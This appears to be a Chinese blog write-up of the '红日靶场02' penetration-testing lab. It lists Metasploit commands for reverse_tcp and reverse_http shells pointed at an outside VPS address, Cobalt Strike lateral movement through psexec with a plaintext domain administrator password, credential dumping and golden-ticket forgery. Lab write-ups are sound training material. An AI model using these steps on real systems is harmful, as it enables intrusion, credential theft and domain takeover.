红日靶场02
1. 首先发现 weblogic 漏洞,直接打开工具一把梭,上传内存马,哥斯拉连接
2. 打开 cs 设置一个监听器,vps 为服务器 ip
3.msf 开启监听
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 11111
lport => 11111
msf5 exploit(multi/handler) > run
4. 哥斯拉一键反弹 shell
5. 直接命令派生到 cs
background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 117.50.196.44
set lport 81
set session 1
run
//session会变
6.cs 成功上线
7. 提权,右键上线目标
8. 成功新上线 system 权限
9. 抓取远程服务密码
10. 成功抓取到 DC 域的账号密码
11. 直接登陆
12. 横向移动,直接在 cs 操作
rev2self
make_token delay.com\Administrator Aa@123456
jump psexec DC 1
13. 直接横向成功
14. 黄金票据的伪造
(1) hashdump 获取 hash 数
(2) 获取域 SID
(3) 右键添加黄金票据
(4) 直接输入 SID,Hash
(5) 成功创建
### 参考:
https://blog.csdn.net/qq_45780190/article/details/123156086
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 月光倾泻与山海,你跌进我的梦里!